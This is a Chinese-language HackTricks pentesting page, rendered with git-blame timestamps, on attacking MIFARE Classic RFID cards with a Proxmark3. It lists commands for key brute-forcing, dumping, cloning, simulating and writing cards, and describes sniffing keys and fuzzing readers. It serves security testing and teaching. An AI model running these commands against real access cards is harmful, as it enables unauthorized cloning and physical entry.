2022-12-24 11:52:08 +00:00
|
|
|
|
# Proxmark 3
|
|
|
|
|
|
|
|
|
|
<details>
|
|
|
|
|
|
2023-04-25 18:35:28 +00:00
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
2022-12-24 11:52:08 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
* 你在一家**网络安全公司**工作吗?想要在HackTricks中看到你的**公司广告**吗?或者你想要**获取PEASS的最新版本或下载HackTricks的PDF**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
|
|
|
|
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
|
|
|
|
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
|
|
|
|
|
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass),或者**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
|
|
|
|
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
|
2022-12-24 11:52:08 +00:00
|
|
|
|
|
|
|
|
|
</details>
|
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
## 使用Proxmark3攻击RFID系统
|
2022-12-24 11:52:08 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
首先,你需要有一个[**Proxmark3**](https://proxmark.com)并且[**安装软件及其依赖项**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux)[**s**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux)。
|
2022-12-24 11:52:08 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
### 攻击MIFARE Classic 1KB
|
2022-12-24 11:52:08 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
它有**16个扇区**,每个扇区有**4个块**,每个块包含**16B**。UID位于扇区0块0中(不能更改)。\
|
|
|
|
|
要访问每个扇区,你需要**2个密钥**(**A**和**B**),它们存储在每个扇区的**块3**中(扇区尾部)。扇区尾部还存储了**访问位**,使用这两个密钥对**每个块**进行**读取和写入**权限控制。\
|
|
|
|
|
如果你知道第一个密钥,那么两个密钥都可以用来授予读取权限;如果你知道第二个密钥,那么两个密钥都可以用来授予写入权限(例如)。
|
2022-12-24 11:52:08 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
可以执行多种攻击方法
|
2022-12-24 11:52:08 +00:00
|
|
|
|
```bash
|
|
|
|
|
proxmark3> hf mf #List attacks
|
|
|
|
|
|
|
|
|
|
proxmark3> hf mf chk *1 ? t ./client/default_keys.dic #Keys bruteforce
|
|
|
|
|
proxmark3> hf mf fchk 1 t # Improved keys BF
|
|
|
|
|
|
|
|
|
|
proxmark3> hf mf rdbl 0 A FFFFFFFFFFFF # Read block 0 with the key
|
|
|
|
|
proxmark3> hf mf rdsc 0 A FFFFFFFFFFFF # Read sector 0 with the key
|
|
|
|
|
|
|
|
|
|
proxmark3> hf mf dump 1 # Dump the information of the card (using creds inside dumpkeys.bin)
|
|
|
|
|
proxmark3> hf mf restore # Copy data to a new card
|
|
|
|
|
proxmark3> hf mf eload hf-mf-B46F6F79-data # Simulate card using dump
|
|
|
|
|
proxmark3> hf mf sim *1 u 8c61b5b4 # Simulate card using memory
|
|
|
|
|
|
|
|
|
|
proxmark3> hf mf eset 01 000102030405060708090a0b0c0d0e0f # Write those bytes to block 1
|
|
|
|
|
proxmark3> hf mf eget 01 # Read block 1
|
|
|
|
|
proxmark3> hf mf wrbl 01 B FFFFFFFFFFFF 000102030405060708090a0b0c0d0e0f # Write to the card
|
|
|
|
|
```
|
2023-08-03 19:12:22 +00:00
|
|
|
|
Proxmark3允许执行其他操作,如窃听标签与读卡器之间的通信,以尝试找到敏感数据。在这种卡片中,您可以仅仅通过嗅探通信并计算使用的密钥,因为使用的加密操作是薄弱的,通过知道明文和密文,您可以计算出它(`mfkey64`工具)。
|
2022-12-24 11:52:08 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
### 原始命令
|
2022-12-24 11:52:08 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
物联网系统有时使用非品牌或非商业标签。在这种情况下,您可以使用Proxmark3向标签发送自定义的原始命令。
|
2022-12-24 11:52:08 +00:00
|
|
|
|
```bash
|
|
|
|
|
proxmark3> hf search UID : 80 55 4b 6c ATQA : 00 04
|
|
|
|
|
SAK : 08 [2]
|
|
|
|
|
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
|
2023-08-03 19:12:22 +00:00
|
|
|
|
proprietary non iso14443-4 card found, RATS not supported
|
|
|
|
|
No chinese magic backdoor command detected
|
|
|
|
|
Prng detection: WEAK
|
|
|
|
|
Valid ISO14443A Tag Found - Quiting Search
|
2022-12-24 11:52:08 +00:00
|
|
|
|
```
|
2023-08-03 19:12:22 +00:00
|
|
|
|
通过这些信息,您可以尝试搜索有关该卡片以及与其通信的方式的信息。Proxmark3允许发送原始命令,例如:`hf 14a raw -p -b 7 26`
|
2022-12-24 11:52:08 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
### 脚本
|
2022-12-24 11:52:08 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
Proxmark3软件附带了一系列**自动化脚本**,您可以使用这些脚本执行简单的任务。要检索完整列表,请使用`script list`命令。然后,使用`script run`命令,后跟脚本的名称:
|
2022-12-24 11:52:08 +00:00
|
|
|
|
```
|
|
|
|
|
proxmark3> script run mfkeys
|
|
|
|
|
```
|
2023-08-03 19:12:22 +00:00
|
|
|
|
您可以创建一个脚本来**模糊测试标签读卡器**,通过复制一个**有效卡片**的数据,编写一个**Lua脚本**来**随机化**一个或多个随机**字节**,并检查读卡器在任何迭代中是否崩溃。
|
2022-12-24 11:52:08 +00:00
|
|
|
|
|
|
|
|
|
<details>
|
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 YouTube 🎥</strong></a></summary>
|
2022-12-24 11:52:08 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
* 您在**网络安全公司**工作吗?您想在HackTricks中看到您的**公司广告**吗?或者您想要访问**PEASS的最新版本或下载PDF格式的HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
|
|
|
|
* 发现我们的独家[NFT收藏品**The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
|
|
|
|
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
|
|
|
|
|
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram群组**](https://t.me/peass) 或 **关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
|
|
|
|
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享您的黑客技巧。**
|
2022-12-24 11:52:08 +00:00
|
|
|
|
|
|
|
|
|
</details>
|